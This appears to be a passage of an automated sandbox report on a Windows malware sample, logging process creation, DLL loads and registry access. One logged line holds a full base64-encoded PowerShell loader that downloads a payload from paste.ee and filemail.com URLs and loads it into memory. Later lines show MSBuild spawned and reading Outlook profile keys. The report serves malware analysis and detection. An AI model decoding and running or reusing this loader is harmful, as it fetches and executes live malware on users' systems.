XQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABhAGQAagBvAHUAcgBuAG0AZQBuAHQAIAA9ACAAJwAwAC8AbQBtAFkAWABSAHkAWABRAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwA7ACQAcABlAG4AdABhAGQAaQBjACAAPQAgACQAYQBkAGoAbwB1AHIAbgBtAGUAbgB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABmAGEAcgBhAGQAaQB6AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMwAwADAANQAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AbgBJAHgAXwA1AFQAMABMAHgASABPAEIAagBpAGwATgBiADkAQwBSAHYAaQBhAGIAUABqAHIAVwAyAGQAbABDAC0ATAB4AGUATwBkAEoAUABGAF8AWgBfADEATQBQADYAQwB1AFEAQgBTADUASwBjAHAAdABBACYAcABrAF8AdgBpAGQAPQAzADQAMgA4ADAAMwBkADEAYwBjADQAZQAzAGIAOAAwADEANwAzADkAMwA1ADkAMgAwADMAYgA1AGYAZQA5AGQAJwA7ACQAZQBvAGwAaQBhAG4AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAHIAbwB0AGkAYwAgAD0AIAAkAGUAbwBsAGkAYQBuAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGYAYQByAGEAZABpAHoAZQApADsAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQByAG8AdABpAGMAKQA7ACQAbABhAHUAbgBkAGUAcgBlAHIAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAHMAZQBtAGkAcABoAHkAbABsAGkAZABpAGEAbgAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABsAGEAdQBuAGQAZQByAGUAcgApADsAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAAPQAgACQAaAB5AGUAdABvAG0AZQB0AHIAbwBnAHIAYQBwAGgALgBJAG4AZABlAHgATwBmACgAJABzAGUAbQBpAHAAaAB5AGwAbABpAGQAaQBhAG4AKQA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGYAcgBhAGMAdABpAG8AbgBhAHQAaQBuAGcAIAAtAGcAdAAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwAgACsAPQAgACQAbABhAHUAbgBkAGUAcgBlAHIALgBMAGUAbgBnAHQAaAA7ACQAcwBoAGUAZQByAGwAZQBzAHMAIAA9ACAAJABmAHIAYQBjAHQAaQBvAG4AYQB0AGkAbgBnACAALQAgACQAYwBvAG4AZgBlAGMAdABpAG8AbgBlAHIAcwA7ACQAZwBuAGEAcgBsAGkAZQBzAHQAIAA9ACAAJABoAHkAZQB0AG8AbQBlAHQAcgBvAGcAcgBhAHAAaAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8AbgBmAGUAYwB0AGkAbwBuAGUAcgBzACwAIAAkAHMAaABlAGUAcgBsAGUAcwBzACkAOwAkAHAAaQBsAHAAdQBsAGkAcwB0AGkAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAG4AYQByAGwAaQBlAHMAdAApADsAJABsAG8AYwB1AHMAdABpAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcABpAGwAcAB1AGwAaQBzAHQAaQBjACkAOwAkAFYAZQBsAHUAdwBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcABlAG4AdABhAGQAaQBjACwAJwAnACwAJwAnACwAJwAnACwAJwBNAFMAQgB1AGkAbABkACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcALAAnACcAKQApAAJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1469679668.00007FFAAC870000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1460213682.000001F5E3450000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2 source: powershell.exe, 00000002.00000002.1468802329.00007FFAAC7EC000.00000004.00000800.00020000.00000000.sdmp
